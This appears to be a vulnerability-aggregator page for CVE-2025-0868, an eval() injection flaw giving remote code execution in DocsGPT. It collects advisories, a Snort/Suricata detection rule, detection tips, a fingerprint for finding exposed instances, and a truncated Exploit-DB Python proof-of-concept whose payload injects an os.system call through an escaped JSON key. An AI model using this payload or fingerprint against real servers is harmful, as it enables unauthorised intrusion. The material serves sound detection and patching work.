CVE-2025-0868
published 2025-02-20CVE-2025-0868: A vulnerability, that could result in Remote Code Execution (RCE), has been found in DocsGPT. Due to improper parsing of JSON data using eval() an unauthorized…
PriorityP187critical9.3CVSS 4.0
AVNACLATNPRNUINVCHVIHVAHSCNSINSANEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
15.10%
96.3th percentile
A vulnerability, that could result in Remote Code Execution (RCE), has been found in DocsGPT. Due to improper parsing of JSON data using eval() an unauthorized attacker could send arbitrary Python code to be executed via /api/remote endpoint..
This issue affects DocsGPT: from 0.8.1 through 0.12.0.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arc53 | docsgpt | 0.8.1 – 0.12.0 | — |
| arc53 | docsgpt | 0.8.1 – 0.12.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS DocsGPT Remote Code Execution Attempt (CVE-2025-0868)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:11; content:"/api/remote"; http.request_body; content:"user|3d|"; content:"source|3d|"; content:"name|3d|"; content:"data|3d 7b|"; content:"|22|source|22 3a 22|"; content:"|22|client_id|22 3a 22|"; content:"|22|client_secret|22 3a|"; content:"|22|user_agent|22 3a 22|"; content:"|22|search_queries|22 3a|"; content:"|22|number_posts|22 3a|"; content:"|22|rce|5c 5c 5c 5c 22 3a 5f 5f|import|5f 5f 28 27|"; fast_pattern; reference:url,github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-0868.yaml; reference:cve,2025-0868; classtype:attempted-admin; sid:2060779; rev:1; metadata:attack_target Server, tls_state plaintext, created_at 2025_03_11, cve CVE_2025_0868, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2025_03_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
- →Detect POST requests to /api/remote with a URL-encoded body containing the 'rce' key followed by escaped quotes and __import__ — the canonical injection pattern for this CVE.
- →The Nuclei template matches on both an out-of-band DNS interaction (via interactsh) AND response body fields '"task_id":' and '"status":' to confirm successful exploitation.
- →FOFA fingerprint for identifying exposed DocsGPT instances: search for body containing 'Welcome to DocsGPT'.
- →The exploit payload smuggles Python code inside a JSON key name by injecting an escaped quote sequence ('rce\\\":') to break out of the JSON structure and inject into the eval() call.
- →The HTTP request body must include all of: user=, source=, name=, data={...} with client_id, client_secret, user_agent, search_queries, number_posts fields — all required by the vulnerable endpoint before eval() is reached.
- ·The exploit targets a specific port (7091) in the PoC, but this is the author's local test configuration — the actual DocsGPT deployment port may vary. ↗
- ·The Snort rule (sid:2060779) is scoped to plaintext HTTP only (tls_state plaintext); TLS-wrapped deployments of DocsGPT will not be detected by this rule without SSL inspection.
- ·The vulnerability affects versions 0.8.1 through 0.12.0 inclusive; version 0.12.1 and later are remediated. ↗
CVSS provenance
nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.3CRITICAL
vendor_redhat6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
DocsGPT Allows Remote Code Execution
ghsa·2025-02-20
CVE-2025-0868 [CRITICAL] CWE-77 DocsGPT Allows Remote Code Execution
DocsGPT Allows Remote Code Execution
A vulnerability, that could result in Remote Code Execution (RCE), has been found in DocsGPT. Due to improper parsing of JSON data using eval() an unauthorized attacker could send arbitrary Python code to be executed via /api/remote endpoint.
This issue affects DocsGPT: from 0.8.1 through 0.12.0.
OSV
DocsGPT Allows Remote Code Execution
osv·2025-02-20
CVE-2025-0868 [CRITICAL] DocsGPT Allows Remote Code Execution
DocsGPT Allows Remote Code Execution
A vulnerability, that could result in Remote Code Execution (RCE), has been found in DocsGPT. Due to improper parsing of JSON data using eval() an unauthorized attacker could send arbitrary Python code to be executed via /api/remote endpoint.
This issue affects DocsGPT: from 0.8.1 through 0.12.0.
VulnCheck
Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
vulncheck·2025·CVSS 9.3
CVE-2025-0868 [CRITICAL] Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
A vulnerability, that could result in Remote Code Execution (RCE), has been found in DocsGPT. Due to improper parsing of JSON data using eval() an unauthorized attacker could send arbitrary Python code to be executed via /api/remote endpoint..
This issue affects DocsGPT: from 0.8.1 through 0.12.0.
Affected: Arc53 DocsGPT
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-06-08&host_type=src&vulnerability=cve-2025-0868; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map
Red Hat
postgresql: PostgreSQL executes arbitrary code in restore operation
vendor_redhat·2025-08-14·CVSS 6.8
CVE-2025-8715 [MEDIUM] CWE-93 postgresql: PostgreSQL executes arbitrary code in restore operation
postgresql: PostgreSQL executes arbitrary code in restore operation
Improper neutralization of newlines in pg_dump in PostgreSQL allows a user of the origin server to inject arbitrary code for restore-time execution as the client operating system account running psql to restore the dump, via psql meta-commands inside a purpose-crafted object name. The same attacks can achieve SQL injection as a superuser of the restore target server. pg_dumpall, pg_restore, and pg_upgrade are also affected. Versions before PostgreSQL 17.6, 16.10, 15.14, 14.19, and 13.22 are affected. Versions before 11.20 are unaffected. CVE-2012-0868 had fixed this class of problem, but version 11.20 reintroduced it.
A flaw was found in PostgreSQL. This vulnerability allows a malicious user of the PostgreSQL server to i
Suricata
ET WEB_SPECIFIC_APPS DocsGPT Remote Code Execution Attempt (CVE-2025-0868)
suricata·2025-03-11·CVSS 9.3
CVE-2025-0868 [CRITICAL] ET WEB_SPECIFIC_APPS DocsGPT Remote Code Execution Attempt (CVE-2025-0868)
ET WEB_SPECIFIC_APPS DocsGPT Remote Code Execution Attempt (CVE-2025-0868)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS DocsGPT Remote Code Execution Attempt (CVE-2025-0868)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:11; content:"/api/remote"; http.request_body; content:"user|3d|"; content:"source|3d|"; content:"name|3d|"; content:"data|3d 7b|"; content:"|22|source|22 3a 22|"; content:"|22|client_id|22 3a 22|"; content:"|22|client_secret|22 3a|"; content:"|22|user_agent|22 3a 22|"; content:"|22|search_queries|22 3a|"; content:"|22|number_posts|22 3a|"; content:"|22|rce|5c 5c 5c 5c 22 3a 5f 5f|import|5f 5f 28 27|"; fast_pattern; reference:url,github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-0868.yaml; ref
Exploit-DB
DocsGPT 0.12.0 - Remote Code Execution
exploitdb·2025-04-09·CVSS 9.3
CVE-2025-0868 [CRITICAL] DocsGPT 0.12.0 - Remote Code Execution
DocsGPT 0.12.0 - Remote Code Execution
---
# Exploit Title: DocsGPT 0.12.0 - Remote Code Execution
# Date: 09/04/2025
# Exploit Author: Shreyas Malhotra (OSMSEC)
# Vendor Homepage: https://github.com/arc53/docsgpt
# Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip
# Version: 0.8.1 through 0.12.0
# Tested on: Debian Linux/Ubuntu Linux/Kali Linux
# CVE: CVE-2025-0868
import requests
# TARGET CONFIG
TARGET = "http://10.0.2.15:7091" # Change this
# Malicious payload string - carefully escaped - modify the python code if necessary
malicious_data = (
'user=1&source=reddit&name=other&data={"source":"reddit",'
'"client_id":"1111","client_secret":1111,"user_agent":"111",'
'"search_queries":[""],"number_posts":10,'
'"rce\\\\":__import__(\'os\').system(\'touch /tmp/te
Nuclei
DocsGPT - Unauthenticated Remote Code Execution
nuclei·CVSS 9.3
CVE-2025-0868 [CRITICAL] DocsGPT - Unauthenticated Remote Code Execution
DocsGPT - Unauthenticated Remote Code Execution
A vulnerability, that could result in Remote Code Execution (RCE), has been found in DocsGPT. Due to improper parsing of JSON data using eval() an unauthorized attacker could send arbitrary Python code to be executed via /api/remote endpoint.This issue affects DocsGPT- from 0.8.1 through 0.12.0.
Template:
id: CVE-2025-0868
info:
name: DocsGPT - Unauthenticated Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
A vulnerability, that could result in Remote Code Execution (RCE), has been found in DocsGPT. Due to improper parsing of JSON data using eval() an unauthorized attacker could send arbitrary Python code to be executed via /api/remote endpoint.This issue affects DocsGPT- from 0.8.1 through
2025-02-20
Published
Exploited in the wild